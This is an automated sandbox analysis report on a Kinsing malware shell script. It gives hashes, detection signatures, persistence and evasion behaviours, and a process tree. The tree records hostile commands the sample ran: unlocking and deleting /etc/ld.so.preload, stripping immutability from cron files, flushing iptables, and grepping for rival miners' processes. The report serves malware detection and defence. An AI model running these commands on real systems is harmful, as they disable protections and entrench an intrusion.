Analysis
-
max time kernel
98s -
max time network
110s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
24/02/2025, 02:05
Static task
static1
Behavioral task
behavioral1
Sample
03e4f04531cb41a4a13e29255ff3e647697f9aaea9b0e83d21d62f354940c881.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
03e4f04531cb41a4a13e29255ff3e647697f9aaea9b0e83d21d62f354940c881.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
03e4f04531cb41a4a13e29255ff3e647697f9aaea9b0e83d21d62f354940c881.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
03e4f04531cb41a4a13e29255ff3e647697f9aaea9b0e83d21d62f354940c881.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
03e4f04531cb41a4a13e29255ff3e647697f9aaea9b0e83d21d62f354940c881.sh
-
Size
15KB
-
MD5
c9974199c64ca76d0bb11e3b22df32f4
-
SHA1
10dd09ae38ee8f63224da66aa610cc0b23be562a
-
SHA256
03e4f04531cb41a4a13e29255ff3e647697f9aaea9b0e83d21d62f354940c881
-
SHA512
14ab16109cd6569551d5359371cdfd1bdb42cfa52312daec2344852291113c78bd483d0e8e8c3a915078c0dcb8d93dd2ad7cc1d10efc4551de4539aee924ec3e
-
SSDEEP
384:r5JxgzLuqlH2wx2vUaQa5/eN86704s80ooJQYgykWT4yCtvUsDjdWOoJwH:trgXux7YJDj8OoJwH
Malware Config
Signatures
-
Kinsing Rootkit
Rootkit reuses the publicly available BEURK rootkit.
-
Kinsing Rootkit payload 1 IoCs
resource yara_rule behavioral4/files/fstream-17.dat family_elf_kinsing_rootkit -
Kinsing family
-
Kinsing payload 1 IoCs
resource yara_rule behavioral4/files/fstream-16.dat family_elf_kinsing_loader -
Kinsing_rootkit family
-
Modifies the dynamic linker configuration file 2 TTPs 1 IoCs
Malware can modify the configuration file of the dynamic linker to preload malicous libraries with every executed process.
description ioc Process File opened for modification /etc/ld.so.preload 03e4f04531cb41a4a13e29255ff3e647697f9aaea9b0e83d21d62f354940c881.sh -
File and Directory Permissions Modification 1 TTPs 8 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1687 chmod 1689 chmod 1698 chmod 1700 chmod 1705 chmod 1707 chmod 1713 chmod 1714 chmod -
Executes dropped EXE 1 IoCs
ioc pid Process /etc/data/kinsing 1715 03e4f04531cb41a4a13e29255ff3e647697f9aaea9b0e83d21d62f354940c881.sh -
Flushes firewall rules 1 TTPs 1 IoCs
Flushes/ disables firewall rules inside the Linux kernel.
pid Process 716 iptables -
Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs
Abuse sudo or cached sudo credentials to execute code.
pid Process 1435 sudo -
Attempts to change immutable files 50 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
pid Process 713 chattr 1504 xargs 1676 xargs 711 chattr 1444 uname 1545 xargs 1557 xargs 1593 sed 1620 sed 1625 xargs 1642 xargs 703 chattr 1489 xargs 1539 xargs 1602 sed 1611 sed 1614 sed 1637 xargs 1665 xargs 1468 xargs 1478 xargs 1521 xargs 1533 xargs 1551 xargs 1622 xargs 1499 xargs 1590 sed 1599 sed 1601 xargs 1604 xargs 1613 xargs 1616 xargs 1598 xargs 1509 xargs 1514 xargs 1526 xargs 1589 xargs 1596 sed 1617 sed 1654 xargs 1483 xargs 1592 xargs 1595 xargs 1607 xargs 1681 xargs 1473 xargs 1494 xargs 1605 sed 1619 xargs 1623 sed -
Creates/modifies Cron job 1 TTPs 64 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.tvrkoX crontab File opened for modification /var/spool/cron/crontabs/tmp.YMSOrj crontab File opened for modification /var/spool/cron/crontabs/tmp.STcPQK crontab File opened for modification /var/spool/cron/crontabs/tmp.An8hNt crontab File opened for modification /var/spool/cron/crontabs/tmp.UZ0gYf crontab File opened for modification /var/spool/cron/crontabs/tmp.adNBcR crontab File opened for modification /var/spool/cron/crontabs/tmp.zp37vO crontab File opened for modification /var/spool/cron/crontabs/tmp.nN6AAU crontab File opened for modification /var/spool/cron/crontabs/tmp.AX5pUq crontab File opened for modification /var/spool/cron/crontabs/tmp.24Vpg7 crontab File opened for modification /var/spool/cron/crontabs/tmp.O7AQeH crontab File opened for modification /var/spool/cron/crontabs/tmp.iIECrp crontab File opened for modification /var/spool/cron/crontabs/tmp.o2oJHe crontab File opened for modification /var/spool/cron/crontabs/tmp.KBa8Xu crontab File opened for modification /var/spool/cron/crontabs/tmp.gij19L crontab File opened for modification /var/spool/cron/crontabs/tmp.P9wbOn crontab File opened for modification /var/spool/cron/crontabs/tmp.6sIX64 crontab File opened for modification /var/spool/cron/crontabs/tmp.UN1nFK crontab File opened for modification /var/spool/cron/crontabs/tmp.CxtLnc crontab File opened for modification /var/spool/cron/crontabs/tmp.GIRlbW crontab File opened for modification /var/spool/cron/crontabs/tmp.KA3jju crontab File opened for modification /var/spool/cron/crontabs/tmp.gOSINf crontab File opened for modification /var/spool/cron/crontabs/tmp.S0Inqm crontab File opened for modification /var/spool/cron/crontabs/tmp.1JbKdR crontab File opened for modification /var/spool/cron/crontabs/tmp.G9dtud crontab File opened for modification /var/spool/cron/crontabs/tmp.8Qxh31 crontab File opened for modification /var/spool/cron/crontabs/tmp.LBtLI1 crontab File opened for modification /var/spool/cron/crontabs/tmp.4n5FoB crontab File opened for modification /var/spool/cron/crontabs/tmp.0vJUQj crontab File opened for modification /var/spool/cron/crontabs/tmp.c0ew4f crontab File opened for modification /var/spool/cron/crontabs/tmp.W5Lmkf crontab File opened for modification /var/spool/cron/crontabs/tmp.x6Lzud crontab File opened for modification /var/spool/cron/crontabs/tmp.FFZxsV crontab File opened for modification /var/spool/cron/crontabs/tmp.bknQRb crontab File opened for modification /var/spool/cron/crontabs/tmp.X7gixg crontab File opened for modification /var/spool/cron/crontabs/tmp.L3lA1V crontab File opened for modification /var/spool/cron/crontabs/tmp.lvGbAN crontab File opened for modification /var/spool/cron/crontabs/tmp.445Y8f crontab File opened for modification /var/spool/cron/crontabs/tmp.eXFSNk crontab File opened for modification /var/spool/cron/crontabs/tmp.Lp3jjH crontab File opened for modification /var/spool/cron/crontabs/tmp.o44TLS crontab File opened for modification /var/spool/cron/crontabs/tmp.PkvilQ crontab File opened for modification /var/spool/cron/crontabs/tmp.ukDH0V crontab File opened for modification /var/spool/cron/crontabs/tmp.HRNezc crontab File opened for modification /var/spool/cron/crontabs/tmp.TMQ3Gd crontab File opened for modification /var/spool/cron/crontabs/tmp.RIdnTp crontab File opened for modification /var/spool/cron/crontabs/tmp.zHzCcT crontab File opened for modification /var/spool/cron/crontabs/tmp.TKKaWB crontab File opened for modification /var/spool/cron/crontabs/tmp.cj8Jlx crontab File opened for modification /var/spool/cron/crontabs/tmp.x6NoP3 crontab File opened for modification /var/spool/cron/crontabs/tmp.9695Hh crontab File opened for modification /var/spool/cron/crontabs/tmp.MdXKQQ crontab File opened for modification /var/spool/cron/crontabs/tmp.9gSVPA crontab File opened for modification /var/spool/cron/crontabs/tmp.BmRuIh crontab File opened for modification /var/spool/cron/crontabs/tmp.f8IT4K crontab File opened for modification /var/spool/cron/crontabs/tmp.Z9vU2l crontab File opened for modification /var/spool/cron/crontabs/tmp.Z0uade crontab File opened for modification /var/spool/cron/crontabs/tmp.ftksBN crontab File opened for modification /var/spool/cron/crontabs/tmp.dh3tRQ crontab File opened for modification /var/spool/cron/crontabs/tmp.EQ4xON crontab File opened for modification /var/spool/cron/crontabs/tmp.AYEV3d crontab File opened for modification /var/spool/cron/crontabs/tmp.FRg25D crontab File opened for modification /var/spool/cron/crontabs/tmp.IPrX7l crontab File opened for modification /var/spool/cron/crontabs/tmp.4WleVt crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Modifies systemd 2 TTPs 1 IoCs
Adds/ modifies systemd service files. Likely to achieve persistence.
description ioc Process File opened for modification /lib/systemd/system/bot.service 03e4f04531cb41a4a13e29255ff3e647697f9aaea9b0e83d21d62f354940c881.sh -
Reads CPU attributes 1 TTPs 64 IoCs
description ioc Process File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online exim4 File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online exim4 File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill -
Enumerates kernel/hardware configuration 1 TTPs 2 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
description ioc Process File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl -
Process Discovery 1 TTPs 12 IoCs
Adversaries may try to discover information about running processes.
pid Process 1495 ps 1510 ps 1522 ps 1585 ps 1490 ps 1500 ps 1505 ps 1517 ps 1633 ps 1638 ps 1677 ps 1485 ps -
description ioc Process File opened for reading /proc/4/stat ps File opened for reading /proc/76/status ps File opened for reading /proc/8/cmdline ps File opened for reading /proc/36/status ps File opened for reading /proc/18/cmdline pkill File opened for reading /proc/167/status pkill File opened for reading /proc/6/status ps File opened for reading /proc/378/status pkill File opened for reading /proc/meminfo ps File opened for reading /proc/84/cmdline pkill File opened for reading /proc/698/cmdline pkill File opened for reading /proc/372/status pkill File opened for reading /proc/1633/cmdline ps File opened for reading /proc/1/stat ps File opened for reading /proc/671/cmdline ps File opened for reading /proc/20/status ps File opened for reading /proc/71/cmdline ps File opened for reading /proc/1499/stat ps File opened for reading /proc/74/cmdline pkill File opened for reading /proc/81/cmdline pkill File opened for reading /proc/19/cmdline pkill File opened for reading /proc/700/status pkill File opened for reading /proc/filesystems ls File opened for reading /proc/74/status pkill File opened for reading /proc/23/status pkill File opened for reading /proc/669/cmdline pkill File opened for reading /proc/84/cmdline pkill File opened for reading /proc/21/cmdline pkill File opened for reading /proc/24/cmdline ps File opened for reading /proc/1669/status ps File opened for reading /proc/filesystems ls File opened for reading /proc/19/status pkill File opened for reading /proc/702/cmdline pkill File opened for reading /proc/72/status ps File opened for reading /proc/filesystems crontab File opened for reading /proc/106/cmdline pkill File opened for reading /proc/167/cmdline ps File opened for reading /proc/699/stat ps File opened for reading /proc/76/cmdline pkill File opened for reading /proc/75/stat ps File opened for reading /proc/1/status pkill File opened for reading /proc/sys/kernel/osrelease pkill File opened for reading /proc/665/status ps File opened for reading /proc/700/cmdline pkill File opened for reading /proc/73/status ps File opened for reading /proc/12/status pkill File opened for reading /proc/21/cmdline pkill File opened for reading /proc/14/cmdline pkill File opened for reading /proc/filesystems ls File opened for reading /proc/8/status pkill File opened for reading /proc/7/cmdline ps File opened for reading /proc/78/cmdline ps File opened for reading /proc/24/status pkill File opened for reading /proc/84/cmdline pkill File opened for reading /proc/20/cmdline pkill File opened for reading /proc/10/status ps File opened for reading /proc/7/status ps File opened for reading /proc/2/cmdline pkill File opened for reading /proc/378/status pkill File opened for reading /proc/702/status pkill File opened for reading /proc/81/stat ps File opened for reading /proc/6/cmdline pkill File opened for reading /proc/1665/status ps File opened for reading /proc/meminfo ps -
System Network Configuration Discovery 1 TTPs 2 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1384 ls 1820 sed
Processes
-
/tmp/03e4f04531cb41a4a13e29255ff3e647697f9aaea9b0e83d21d62f354940c881.sh/tmp/03e4f04531cb41a4a13e29255ff3e647697f9aaea9b0e83d21d62f354940c881.sh1⤵
- Modifies the dynamic linker configuration file
- Executes dropped EXE
- Modifies systemd
PID:700 -
/usr/bin/chattrchattr -i /etc/ld.so.preload2⤵
- Attempts to change immutable files
PID:703
-
-
/bin/rmrm -f /etc/ld.so.preload2⤵PID:709
-
-
/usr/bin/chattrchattr -R -ia /var/spool/cron2⤵
- Attempts to change immutable files
PID:711
-
-
/usr/bin/chattrchattr -ia /etc/crontab2⤵
- Attempts to change immutable files
PID:713
-
-
/sbin/iptablesiptables -F2⤵
- Flushes firewall rules
PID:716
-
-
/bin/grepgrep exe2⤵PID:725
-
-
/bin/lsls -latrh /proc/12⤵PID:724
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:730
-
-
/bin/grepgrep exe2⤵PID:735
-
-
/bin/lsls -latrh /proc/102⤵
- Reads runtime system information
PID:734
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:738
-
-
/bin/grepgrep exe2⤵PID:742
-
-
/bin/lsls -latrh /proc/1062⤵PID:741
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:745
-
-
/bin/grepgrep exe2⤵PID:748
-
-
/bin/lsls -latrh /proc/112⤵PID:747
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:752
-
-
/bin/grepgrep exe2⤵PID:756
-
-
/bin/lsls -latrh /proc/1152⤵PID:755
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:758
-
-
/bin/grepgrep exe2⤵PID:762
-
-
/bin/lsls -latrh /proc/1162⤵PID:761
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:764
-
-
/bin/grepgrep exe2⤵PID:767
-
-
/bin/lsls -latrh /proc/122⤵PID:766
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:770
-
-
/bin/lsls -latrh /proc/132⤵PID:772
-
-
/bin/grepgrep exe2⤵PID:773
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:775
-
-
/bin/grepgrep exe2⤵PID:778
-
-
/bin/lsls -latrh /proc/142⤵PID:777
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:780
-
-
/bin/grepgrep exe2⤵PID:783
-
-
/bin/lsls -latrh /proc/1402⤵PID:782
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:785
-
-
/bin/grepgrep exe2⤵PID:788
-
-
/bin/lsls -latrh /proc/1482⤵PID:787
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:790
-
-
/bin/grepgrep exe2⤵PID:793
-
-
/bin/lsls -latrh /proc/152⤵PID:792
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:795
-
-
/bin/grepgrep exe2⤵PID:798
-
-
/bin/lsls -latrh /proc/162⤵PID:797
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:800
-
-
/bin/grepgrep exe2⤵PID:803
-
-
/bin/lsls -latrh /proc/1672⤵PID:802
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:805
-
-
/bin/grepgrep exe2⤵PID:808
-
-
/bin/lsls -latrh /proc/172⤵PID:807
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:810
-
-
/bin/grepgrep exe2⤵PID:813
-
-
/bin/lsls -latrh /proc/182⤵PID:812
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:815
-
-
/bin/grepgrep exe2⤵PID:818
-
-
/bin/lsls -latrh /proc/192⤵PID:817
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:820
-
-
/bin/grepgrep exe2⤵PID:823
-
-
/bin/lsls -latrh /proc/22⤵PID:822
-
-
